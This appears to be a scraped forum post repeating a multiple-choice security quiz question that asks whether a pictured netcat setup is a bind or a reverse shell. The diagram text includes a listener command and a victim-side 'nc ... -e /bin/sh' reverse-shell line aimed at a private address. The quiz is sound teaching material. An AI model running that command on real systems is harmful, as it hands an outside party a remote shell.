- In The Diagram Below What Technique Is Being Used On The Target Left Right Victim Attacker 192 168 1 1 Nc Lvp 4444 Li 1 (22.17 KiB) Viewed 32 times
In the diagram below, what technique is being used on the target? Left Right Victim Attacker 192.168.1.1 nc -lvp 4444 Li
-
- Site Admin
- Posts: 899603
- Joined: Mon Aug 02, 2021 8:13 am
In the diagram below, what technique is being used on the target? Left Right Victim Attacker 192.168.1.1 nc -lvp 4444 Li
In the diagram below, what technique is being used on the target? Left Right Victim Attacker 192.168.1.1 nc -lvp 4444 Listening TCP connection port 4444 192.168.1.2 nc 192.168.1.1 4444 -e /bin/sh Connecting ⒸA. A bind shell is created from 192.168.1.2 to 192.168.1.1 OB. A reverse shell is created from 192.168.1.2 to 192.168.1.1 OC A bind shell is created from 192.168.1.1 to 192.168.1.2 O D. A reverse shell is created from 192.168.1.1 to 192.168.1.2